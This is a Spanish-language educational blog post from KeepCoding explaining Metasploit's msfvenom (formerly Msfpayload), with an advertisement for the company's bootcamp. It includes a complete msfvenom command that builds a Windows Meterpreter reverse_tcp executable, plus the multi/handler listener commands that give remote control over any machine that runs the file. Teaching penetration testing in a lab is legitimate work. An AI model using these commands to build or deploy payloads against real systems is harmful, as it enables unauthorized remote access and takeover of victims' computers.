¿Qué es Msfpayload?

Autor: | Última modificación: 18 de abril de 2024 | Tiempo de Lectura: 4 minutos

Algunos de nuestros reconocimientos:

Premios KeepCoding

¿Sabes qué es Msfpayload y cómo se utiliza esta herramienta de Metasploit? En este artículo profundizamos en qué es Msfpayload, pero, primero, te recordamos qué es Metasploit.

¿Qué es Metasploit?

Metasploit es una de las herramientas de hacking ético más conocidas, ya que viene preinstalada en el sistema operativo Kali Linux y reúne miles de herramientas de explotación, reconocimiento del sistema y postexplotación. Aunque algunos pentesters prefieren desarrollar sus propios softwares, Metasploit es un framework ideal para aprender cómo funcionan y se ejecutan exploits y otros programas para tests de intrusión.

Los exploits son softwares diseñados para utilizar vulnerabilidades informáticas como puerta de entrada para el atacante en el sistema. Además de ayudar al hacker a infiltrarse en el ordenador de la víctima, el exploit no ejecuta ninguna acción maliciosa a menos de que se lo indiquemos. El código que ejecuta tareas malignas en el ordenador explotado se conoce como payload.

Para entenderlo a modo de analogía, si el ciberataque fuese un disparo, el exploit sería el proyectil de la bala y el payload la carga que lleva adentro.

Metasploit es un framework que reúne, principalmente, herramientas enfocadas en la explotación de vulnerabilidades. Sin embargo, también cuenta con un amplio módulo de payloads que puedes configurar junto a dichos exploits. Un payload te permitirá:

  • Exfiltar información de la máquina.
  • Ejecutar código de manera remota.
  • Propagar malware en el sistema.
  • Cifrar archivos del sistema.
  • Escalar privilegios.
  • Hacer un movimiento lateral por la red.

En este post, hablaremos sobre una función de Metasploit que se concentra especialmente en la configuración y uso de payloads. A continuación, te explicaremos qué es Msfpayload.

¿Qué es Msfpayload?

Msfpayload es una herramienta de Metasploit cuya función es la de generar ejecutables con un payload determinado. El comando para ejecutarlo ha sido modificado y, ya que cuenta con nuevas funciones para evadir sistemas antivirus, ahora es:

// que es msfvenom
msfvenom

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

Para comenzar a utilizar y aprender qué es Msfpayload o Msfvenom, no es necesario ejecutar la consola de Metasploit. Puedes abrir la herramienta desde una terminal de Kali Linux, usando el comando de arriba.

¿Cómo usar Msfpayload?

Ahora que sabes qué es Msfpayload, te enseñaremos cómo se utiliza en Kali Linux. Antes de eso, es necesario aclarar que el siguiente tutorial está hecho con fines educativos. El propósito de difundir estos conocimientos es entender cómo funciona un ciberataque con el fin de evitarlo.

Con la herramienta msf payload o Msfvenom es posible crear el ejecutable de un payload con un solo comando. Para entenderlo, primero explicaremos cuáles son las variables del mismo.

  • msfvenom: se utiliza para iniciar la herramienta de Metasploit.
  • p: parámetro para definir la ruta del payload. Para nuestro ejemplo, la ruta será «windows/meterpreter/reverse_tcp», esto significa que es un payload de tipo Meterpreter para Windows, con un tipo de conexión inversa a un puerto TCP.
  • LHOST: dirección IP local de tu máquina virtual con Kali Linux. Para este ejemplo, usaremos la IP ficticia 192.168.172.128.
  • LPORT: número de puerto local para que la máquina vulnerada se conecte a la tuya como servidor. Puedes escoger el que quieras. Para este ejemplo, será el 4444.
  • f: parámetro para exportar el payload a un ejecutable.
  • exe: para indicar el tipo de formato del archivo (ejecutable).
  • ejemplo.exe: nombre del archivo.

El código a ejecutar en la terminal de tu máquina virtual con Kali Linux sería:

// msfvenom que es
msfvenom -p windows/meterpreter/reverse_tcp LHOST 192.168.172.128 LPORT 4444 -f exe > ejemplo.exe

Ya tendrás listo el ejecutable con el payload. Ahora, si lo llevases a otra máquina virtual y lo abrieses de inmediato, ¿qué crees que pasaría? La respuesta correcta es: nada aún, ya que para que funcione tendremos que poner el puerto 4444 a la escucha.

Este proceso lo ejecutaremos desde Metasploit.

Ejecución de código remota

Ahora sabes qué es Msfpayload y cómo crear el archivo ejecutable de un payload con esta herramienta. Sin embargo, falta un paso más para que funcione y, a continuación, te explicaremos cómo hacerlo con Metasploit.

Para poner el puerto a la escucha y tomar control remoto de la máquina por medio del payload, lo primero que haremos será abrir la consola de Metasploit. Para ello, ejecuta el siguiente comando en la terminal de una máquina virtual con Kali Linux:

msfconsole

Para elegir el exploit, es decir, el software que te permitirá ejecutar el payload, ingresa el siguiente comando:

use exploit/multi/handler

Luego, para configurarlo con el payload que usaremos, ingresa:

set payload windows/meterpreter/reverse_tcp

Para configurar las variables LHOST (IP de la máquina virtual de Kali) y LPORT (número de puerto de la máquina de Kali elegido) correctamente, ejecuta estos dos comandos:

set LHOST 192.168.172.128
set LPORT 4444

Finalmente, para ejecutar el payload, utiliza el comando:

run

Con este proceso, al ejecutar el archivo «ejemplo.exe» en un ordenador, obtendrás acceso y control remoto sobre el mismo desde el puerto que hayas elegido con Kali. Meterpreter es un payload muy completo para ejecutar todo tipo de tareas de postexplotación. Para aprender a usarlo, lee nuestro post sobre comandos de Meterpreter.

¿Cómo aprender más?

Si quieres seguir aprendiendo sobre qué es Msfpayload y cómo utilizarlo, en KeepCoding tenemos una formación intensiva que te ayudará a lograr tus objetivos. Con el Ciberseguridad Full Stack Bootcamp te formarás con el acompañamiento de especialistas en la materia y podrás aprender sobre pentesting, criptografía, análisis de malware y mucho más en pocos meses. ¡Pide más información!

Posts Relacionados

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado